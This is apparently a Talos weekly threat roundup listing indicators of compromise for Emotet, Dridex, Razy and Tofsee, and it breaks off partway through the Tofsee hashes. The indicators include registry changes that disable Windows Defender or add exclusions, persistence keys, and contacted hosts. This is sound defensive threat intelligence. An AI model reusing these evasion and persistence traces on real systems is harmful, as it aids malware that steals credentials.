Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 16 and Oct. 23. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Doc.Malware.Emotet-9778566-0 Malware Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.Dridex-9779159-1 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Razy-9778111-0 Trojan Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Dropper.Tofsee-9781225-0 Dropper Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Malware.Ponystealer-9778326-0 Malware Ponystealer is known to be able to steal credentials from more than 100 different applications and may also install other malware such as a remote access tool (RAT).
Win.Trojan.Zegost-9778522-0 Trojan Zegost, also known as Zusy, uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Worm.Aspxor-9778626-0 Worm The Aspxor/Asprox, botnet has the capabilities to send spam, download and execute other samples. This botnet is known for collecting credentials from infected computers.
Win.Packed.Lokibot-9778864-1 Packed Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from many popular applications. It is commonly pushed via malicious documents delivered via spam emails.

Threat Breakdown

Doc.Malware.Emotet-9778566-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 40 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: Type
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: ErrorControl
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: DisplayName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: WOW64
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: ObjectName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: ImagePath
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AUTHZ
Value Name: ImagePath
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AUTHZ
Value Name: Description
1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
208[.]180[.]207[.]205 40
185[.]86[.]155[.]2 40
192[.]35[.]157[.]177 17
72[.]21[.]81[.]240 11
192[.]35[.]177[.]64 3
23[.]3[.]13[.]154 2
8[.]248[.]153[.]254 2
205[.]185[.]216[.]42 1
23[.]3[.]13[.]146 1
23[.]3[.]13[.]88 1
23[.]3[.]13[.]153 1
8[.]248[.]163[.]254 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
poppylon[.]com 40
apps[.]digsigtrust[.]com 20
apps[.]identrust[.]com 20
ctldl[.]windowsupdate[.]com 20
cs11[.]wpc[.]v0cdn[.]net 11
e13678[.]dspb[.]akamaiedge[.]net 8
a767[.]dscg3[.]akamai[.]net 5
auto[.]au[.]download[.]windowsupdate[.]com[.]c[.]footprint[.]net 3
cds[.]d2s7q6s2[.]hwcdn[.]net 1
Files and or directories createdOccurrences
%HOMEPATH%\P0ge3qt 40
%HOMEPATH%\P0ge3qt\An7ltj5 40
%HOMEPATH%\P0ge3qt\An7ltj5\Hyu7s9nf.exe 40
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 8
%System32%\SettingsHandlers_Notifications\iertutil.exe (copy) 1
%System32%\avicap32\opengl32.exe (copy) 1
%System32%\driverquery\MsSpellCheckingFacility.exe (copy) 1
%System32%\dsdmo\KBDMONST.exe (copy) 1
%System32%\KBDEST\deviceaccess.exe (copy) 1
%System32%\Windows.Media.Editing\WMVXENCD.exe (copy) 1
%System32%\sensrsvc\winbici.exe (copy) 1
%System32%\wlidfdp\SCardSvr.exe (copy) 1
%System32%\xwizard\ntvdm.exe (copy) 1
%System32%\winsqlite3\kd_02_19a2.exe (copy) 1
%System32%\VEDataLayerHelpers\wintrust.exe (copy) 1
%System32%\sechost\dfrgui.exe (copy) 1
%System32%\cngprovider\AxInstSv.exe (copy) 1
%System32%\share\diskpart.exe (copy) 1
%System32%\kdcom\asferror.exe (copy) 1

File Hashes

00ca7ef024a663527f5295900154321d98f6422070bbdf2c9c2abe268370b811
01b41659d4b3ca5ad9f986d2029f5aa621310edb658267e5f478bd784df82874
0592df728f9353ff5f892eba34b3e4a89511bebcf05071738614f9c16c4c640a
0e28ab1cfd540547e916442f60de01263eaf13058f99d4cd5d15a2cd5c078f1a
11c67e93ede508aef0bb3d1c43fd0dcc4109fa2c3c93811c94f36094662b2c23
1c3dd09ac057aa6b432e637992b2d3f2dac3ec4212fbd51771b0bfd7be470110
30e4cb15ec8c1e838060a3e4fa642919313c6b9c0e9b3eee6cb507eee695f828
334cbaeae02aab74b5bcf567ec6fb87be96ca6deead23214dcfb4fc36598b5f7
34ee1271131f57aa2f657049d06dffbee18342c401fa938e4b023ab21831c2e6
3c517984c0e06ae824d98e654224f7fa8fcc3d11deac5b5bf60537b6e1392711
42b0f6b8bb6f89af3b0522edf491d6fd823bd44170bd828f1864212eab862eda
457b10f1fc21e30d9630120fbbd7f0d7681e7ae38d1a3738cc07621995830543
4c9d27731506fe5559fc9219325d333f4f23342a95d4deb70fb7a96f01c47448
511700e616e51e0cbe96e874e76cef55302bd3c56cb5ebafc49d04e2a817ab27
58d9abbb83b6f4df5a5dc7b782ecfc3a0a400197866d76f14500b97d206a7eab
59330f6abd11ccf8373697955746b598be71ca8c69774640b41ebd9650abb398
638ad04b135c3d25ab4940edbd53701ba6bbe07b16b789410b5c1d06dc9aeb9e
65e2d908e6ada4277630aa4113bdde311bd7e49c0e6e656f3102bbb4f61924e3
66039545c0341ab69ac7dac547c88d087e88a6fe13ea338a5fd0397364c0350c
66e5c84f7f729e36ef0aa28a083377587825de39b6871269f4c8f6cc72899a1f
69723a53775c6a9e152a508cdfa347a0e07201d2efca1c2c0ac1112748a9fcd6
69d1dfe8740210f2f3a0ac300794d5f0e25e14f5b86e20086036c2c501fb92b1
70a35d75979116a3deb5a05fd800b019ce1a1e3cfa73a22c3e547f5fdfc702d6
77cdfff917a2408f0ee9abbc0f607fe7cb8967b25ea422571c36ad69debc73e2
7bc4797a66cfb8dbdc6f95c5568595d0229200838644a798b7228d1bde86b554

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9779159-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
17
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
17
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
17
MutexesOccurrences
9oyJUqbjXN 1
Bf2tpZ9M5w 1
EuV8ZVITEj 1
SQcVyzvjZr 1
WFi3Wcvd6t 1
gveF9H3Ye9 1
kY4RlCPiLB 1
GnxLrgaOzF 1
Km4UneG1Hy 1
Q4ZpUP7xeD 1
Sv4NU9BDmq 1
h48ApnJeKi 1
uNt6gjNfLb 1
zSlUlKcoLB 1
zxTIAI5gom 1
6scNPwn5g4 1
Dn9wcYJ492 1
NFlFZ5EiVX 1
NZonMQojon 1
ekCslJ2Rsn 1
hcNUrK4xm1 1
m4uDfXBrNb 1
p5EiAI71p9 1
8kCBzcmc7C 1
9bJIPDK3vB 1

*See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]9[.]238 17
172[.]217[.]197[.]138/31 11
172[.]217[.]197[.]102 10
104[.]23[.]98[.]190 9
104[.]23[.]99[.]190 8
172[.]217[.]197[.]100/31 8
172[.]217[.]197[.]113 6
23[.]3[.]13[.]88 4
23[.]3[.]13[.]154 2
72[.]21[.]81[.]240 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
pastebin[.]com 17
ctldl[.]windowsupdate[.]com 6
a767[.]dscg3[.]akamai[.]net 5
www[.]mircqwdgfo[.]com 1
www[.]nsyqngctnr[.]com 1
www[.]so6jhq6bmt[.]com 1
www[.]xc51htnm80[.]com 1
www[.]09d9hr8wrr[.]com 1
www[.]ao1kriznyu[.]com 1
www[.]azczgtct7f[.]com 1
www[.]kau0avuyiy[.]com 1
www[.]lwzskntgmb[.]com 1
www[.]ukyl6yelra[.]com 1
www[.]vithsqbyy5[.]com 1
www[.]wuxdfpz8mg[.]com 1
www[.]8bkzpgdyky[.]com 1
www[.]8nmc5drvsq[.]com 1
www[.]kmmlvscxhm[.]com 1
www[.]q56nioy2vj[.]com 1
www[.]tucwswrbz8[.]com 1
www[.]vg5c299aew[.]com 1
www[.]y0ccjreahm[.]com 1
www[.]z8jewpwgkx[.]com 1
www[.]7ngbwgqdhq[.]com 1
www[.]cjd0djurv2[.]com 1

*See JSON for more IOCs

Files and or directories createdOccurrences
<malware cwd>\old_<malware exe name> (copy) 17
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 16
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 2
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 2

File Hashes

1705fe4bd5c70b526e9641308f2222156f258d09625618786db96fd635c34b63
22b4636e62e9b4a05d23f5e9801137fe45d35ffe53eb1cb9400068a61210004c
32dec8268f9723bdfe1c39cee7cdb8518e888c3fcee9209c42b4db988b3b5ed8
3467c3292cde13ee237a0e71c74424a23f88378dacbdf0f55e7ecc65b89494f8
5f9e01b6e488dde6bab37c7f76a3550c0b71e9794419b9337bf59d7335e38171
757f6d99a33c78be96588ab7866181ec16976b26b14c5ef1d60eccb6249621a5
856f85e9e5b23f438d43e5eeebd67232a9c9f9c7ba0c735a2d2359ae2ddd6456
86e3a311f3351c3ce44d40b6cfed6307b3f01539a16b5b0813c7329e2e8b8ed7
87be3ccc1a1c292b31d50d7e630f92d2c3f9db8c445cc38602b8eb3312e2dd16
a5a0d7d3707d5d146ea0da494bbf36793ca8b0ae99821495b8b1468bd70f36b3
b257778f826dce04e576fac63d9f43ef6f5a1f0c0a2a9bef26618c50c78d07f3
c64bccecb4a20026e28fa723721bcee1c3e404c9f70cadc7fbec176f259553fa
c7753d21c1ec14c0557cca2eefc9ba79be2d3f8b596e521ee67b87ff39fbba9b
d77a1880a026b841fcc1d6e099a0b55fbceddd8bf296ccda6c588112bc00eeea
d95275108d7cd15b5a0146db83a92a2b2ae63f91b502d6266ad6378ef81e94aa
e7edb5a5f54b04b317741bcf40e4d6137938020ceb63d931e99cfec992e2c538
e8158063365c49c968723abf3871af829a20d94abc4f36f9d94d434e55419ff0

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Razy-9778111-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER
Value Name: DisableAntiSpyware
6
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableBehaviorMonitoring
6
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableOnAccessProtection
6
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableScanOnRealtimeEnable
6
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER 6
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION 6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: a4f5fc179540a0b155d91b489e6811e2
6
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
2
\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN 1
\MICROSOFT\WINDOWS\CURRENTVERSION\RUN 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: edd3d42a2f83b252a9c7c412bfbb2d3c
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN 1
MutexesOccurrences
BN[ujPYZXcN-3492256] 1
BN[UgjxTVeo-7460476] 1
BN[hHWOygiD-7803797] 1
BN[WQiRoYio-8046880] 1
BN[bWLfWNal-5539592] 1
BN[KFtOFvJT-2296268] 1
BN[gFUNwfhC-7803696] 1
BN[JfEvrEUj-2926500] 1
BN[ZUwyflFN-2777675] 1
BN[vNyDdEPJ-6604977] 1
BN[OJxSJzNY-3397379] 1
BN[DTWZRpFx-7458457] 1
BN[HfwJwuoH-2635657] 1
BN[vUlxmjdv-9403446] 1
BN[XHorMosH-4808625] 1
BN[ZXcNGNrS-2566595] 1
BN[SoNFBNds-4237733] 1
BN[CdzyaIZL-4946588] 1
BN[hGVOxfiD-7809694] 1
BN[JkHGhPgS-5057699] 1
BN[fbmpFabl-0958259] 1
BN[mnJKTrYC-4025752] 1
BN[EyzxDngn-5979029] 1
BN[mUlXbCpn-7005945] 1
BN[ZknDYZjs-8470587] 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
204[.]79[.]197[.]200 3
192[.]35[.]177[.]64 2
3[.]13[.]191[.]225 2
145[.]14[.]145[.]152 2
72[.]21[.]81[.]240 1
23[.]3[.]13[.]154 1
145[.]14[.]145[.]86 1
77[.]111[.]240[.]113 1
3[.]17[.]7[.]232 1
3[.]134[.]39[.]220 1
104[.]28[.]24[.]228 1
172[.]67[.]154[.]168 1
185[.]27[.]134[.]129 1
125[.]65[.]113[.]76 1
193[.]34[.]76[.]44 1
88[.]86[.]120[.]160 1
129[.]146[.]223[.]100 1
178[.]18[.]181[.]223 1
145[.]14[.]144[.]34 1
51[.]89[.]19[.]244 1
31[.]31[.]196[.]199 1
3[.]134[.]125[.]175 1
3[.]14[.]182[.]203 1
145[.]14[.]145[.]78 1
145[.]14[.]144[.]82 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
igfltrial[.]000webhostapp[.]com 2
maxcdn[.]bootstrapcdn[.]com 1
cdn[.]discordapp[.]com 1
apps[.]digsigtrust[.]com 1
apps[.]identrust[.]com 1
us-east-1[.]route-1[.]000webhost[.]awex[.]io 1
discord[.]gg 1
ctldl[.]windowsupdate[.]com 1
a767[.]dscg3[.]akamai[.]net 1
discord[.]com 1
f49da98a05b2[.]ngrok[.]io 1
kommand[.]rf[.]gd 1
www[.]9551777[.]com 1
ancient-parrot-9[.]loca[.]lt 1
www[.]facebook[.]com[.]ngrok[.]io 1
podpora[.]endora[.]cz 1
siresconsultancy[.]com 1
sf-rp[.]8u[.]cz 1
webadmin[.]endora[.]cz 1
www[.]endora[.]cz 1
cdn[.]sellix[.]io 1
cofix[.]best 1
bot[.]rupturnet[.]cf 1
sellix[.]io 1
api[.]ruselektro[.]com 1

*See JSON for more IOCs

Files and or directories createdOccurrences
E:\windows_update.exe 3
%SystemRoot%_update.exe 3
%TEMP%\Microsoft 2
%TEMP%\Microsoft\MyClient 2
%TEMP%\Microsoft\MyClient\WindowsUpdate.exe 2
%System32%\Tasks\'60e1f902e85aca7451c5bf1bb2c41258ae8b9967200a5eb2a65724a5f706c4f5' 1
%System32%\Tasks\'1f45c3057cdb6929ffb4f022670ac3e0adddb2283321d31fc31b069fd6dc7485' 1

File Hashes

019e4cbc3cb028b67a0c89f4d9622bf7b0cac6491d8f6317e67535d43060a756
08198f43bf86d8dbaa602c2f4258ae3bb01cb9d44ba46cc35e1cb9fd93c32a70
0a426de540d22954fc9e865b7770bf2043aae9e3c9c7a6d70270ba2efb2d02e6
0a5220a137d6ca7bd1f5cf4fa3416ce8516b99d126bc763f45829827938d0544
0ad723f9fbefc5c78d199d5bcba8fb402f546e831a6eae6a419f318b7fd88f63
1079bedb436d38bc482f574f2b4fe72facb44d73a2dcdea05bb712eccce34eb5
196868d15be58c850aea8ae7160727dd19be4b9e8c3fd5f1f79328ab25ce9b4a
1c70eae778246e46fd769c80dd2064775b3658945b72ccfe996a7300f8125457
1cefc8caf3c75d1392107e3f298fa3b8d8e2013fd5092106fbc80d810d3086c5
1f45c3057cdb6929ffb4f022670ac3e0adddb2283321d31fc31b069fd6dc7485
20992c0f70f1566dbfaf5223f3c72604a895479d81fef0c29eb83c92bd235890
23771e0b2d902fc6ed1d7052e5f62cd977f2948c18c858c1098ca7db818ea63f
280b22b3f1aec2f065683dacb3d0d066acab7dc8c7b49037feaf0746d46a6da9
28da522603af94339c43e05c649c8db631b5c5da1a94037075d3fd3f70216a9f
2a76819be5a29258097838911daddbaac374acb25a6aaf48729930a1ea21612e
2cbae6d1320b4f53a9dbc7ee4dea1e94d897c0f35ce02e7b74ccc2bdc5c68043
32ff12cad897cb19da29289d95c6afa30b5d7077b1ea101a3415657badab032c
38d6dfbc881aef424965e0064216d17ad6fe2c006143937e385bda176fb6484d
40287cf72786884945a9078adc184c38d3581772b420ab0d9c727c0d4c53f3a5
4b6060ef9ce6815d72a50c723c01489450f863ac63a5c6ab2fe6f7e6b1e690b0
4d8f6d0bf72fdf507902aa870e2fca163b50a8db328ecd1a46aed59878ac24aa
515696920b58e6b778d9faa8100900ff27581cb9d2b99b7e340f2d149eb7db46
544b380fb4ca1b29a198b3bafe5d95537223969e4d1783b3e23a33015544959c
60e1f902e85aca7451c5bf1bb2c41258ae8b9967200a5eb2a65724a5f706c4f5
679a2fa9211a839e246a1ae42b8652040532bde63234826721d14c086449affc

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

ThreatGrid


MITRE ATT&CK


Win.Dropper.Tofsee-9781225-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 38 samples
Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
38
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
38
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
38
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\tmagfnti
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\vocihpvk
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\cvjpowcr
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ibpvucix
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\wpdjiqwl
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\zsgmltzo
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yrflksyn
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\dwkqpxds
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rkyedlrg
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\fymsrzfu
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\xqekjrxm
2
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
239[.]255[.]255[.]250 38
172[.]217[.]10[.]100 38
69[.]55[.]5[.]252 38
43[.]231[.]4[.]6/31 38
85[.]114[.]134[.]88 38
217[.]172[.]179[.]54 38
5[.]9[.]72[.]48 38
130[.]0[.]232[.]208 38
144[.]76[.]108[.]82 38
185[.]253[.]217[.]20 38
45[.]90[.]34[.]87 38
157[.]240[.]18[.]174 35
52[.]223[.]241[.]7 26
69[.]31[.]136[.]5 24
99[.]84[.]104[.]9 23
104[.]83[.]228[.]247 22
104[.]47[.]54[.]36 21
23[.]218[.]146[.]162 20
216[.]239[.]38[.]21 17
104[.]47[.]53[.]36 17
216[.]239[.]36[.]21 16
96[.]114[.]157[.]80 13
12[.]167[.]151[.]116/30 13
37[.]1[.]217[.]172 13
176[.]58[.]123[.]25 12

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
schema[.]org 38
microsoft-com[.]mail[.]protection[.]outlook[.]com 38
252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 38
252[.]5[.]55[.]69[.]in-addr[.]arpa 38
252[.]5[.]55[.]69[.]bl[.]spamcop[.]net 38
252[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 38
252[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 38
252[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 38
www[.]amazon[.]com 29
video-weaver[.]lax03[.]hls[.]ttvnw[.]net 26
native-ps3[.]np[.]ac[.]playstation[.]net 24
api[.]sendspace[.]com 24
account[.]np[.]ac[.]playstation[.]net 20
work[.]a-poster[.]info 13
sso[.]godaddy[.]com 10
doi[.]org 10
www[.]google[.]pl 9
ip[.]pr-cy[.]hacklix[.]com 9
mta7[.]am0[.]yahoodns[.]net 7
mta6[.]am0[.]yahoodns[.]net 7
blo[.]pool-pay[.]com 7
mta5[.]am0[.]yahoodns[.]net 6
ipinfo[.]io 6
mailin-03[.]mx[.]aol[.]com 6
www[.]google[.]co[.]uk 5

*See JSON for more IOCs

Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile 38
%SystemRoot%\SysWOW64\config\systemprofile:.repos 38
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 38
%TEMP%\<random, matching '[a-z]{8}'>.exe 36
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 18
\Documents and Settings\LocalService:.repos 10
%System32%\config\systemprofile:.repos 8
%SystemRoot%\SERVIC~2\Local Settings\AppData\Local\Temp\MpCmdRun.log 8
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 6
%System32%\ommzntm\lnizqkrk.exe (copy) 1
%System32%\vkwynaf\tkdgnaml.exe (copy) 1

File Hashes

035f11aeabe8f3b0062a7b957e977274d36d23f4baf5abb1ec060ead2ca9384a
05d7454ee676423651ef64cab2de94a06b520bcd323a83fbd3a02c0697bc16e7
0e340e2b2a71a208065e33fbf25fec9061049dfa0b1e4e3622dfac98cff5f528
16bdd38fef913547df43a345080ed38b52ff5b3e3c44254059559e92fd730568
19b56ed7cd0258c2088c08731bcb5b3932d0a67ea296be4589729a4f284894b8
1d21359665bdb3afd2e37103c5bcc8262a7b93f9feeeb3aa8d851aeb91f8a0fc
203df24911c76adb0880aa2904d4c6bde812dd0dd0320a63b3e25f4920e89c18
2148c5724d4af031ee1922e91fd8db16e17d68a4430b146c9b8f9effe20076f5
2e3b548d325fe11e2e224c24fbb60dd31a502dc6b3c4630ac3a7c8f6d8832a70
387ac63f0e2d74a8f474357da35595f69981f75c065dfe09470aa2affbea7cfe
4087283e73d95a85a9036bdc24619874f58093fe75ff6327adcbaf50545fb1e0
4258b05bf15ee589672b8d36433f8b4df40112495831a78022f4eb464e1fe039
50f889d654beecd9a84436ac2994d5d4ab82c00e3800d59dd8a0b266e0084d4b
581a07d3daf2b9c243e366fb3f42c0be82a2d61705ad53801be0d05eabbd5e1a
59e4e72664046219835d9fb10f07bbce92ad86733dc6f827373ad20defc46dd9
631d4e6e254f8fdab6aea43d9cc1bfcfb0bc337a740e170bd4c0a638651755a4
682c31fc6ec25052e536ccec9ddabe7f84455f38bc3a4eb0bbf6f32aa4a46003
6a4368e629e3532976e364640c106e3c2144b649c8f8f306b918d878feb689a1
6b9e74c893c4b8bc0f675e047cd4317ed75341a672a692e9192080c5ffa8c5bc
70206122b69106bb7138d5c45aa7387f75f7f3ef9bb23efdfb0788aa110fd6d4
7ab6fa33a55f3b79646f018d334a1556dc959c2b4cd47db042bc620f91e538a7
7c7e554646ae9c6608c9a6d4c03c59f4cbb33e6277c9563707d6ddda8ccbc287
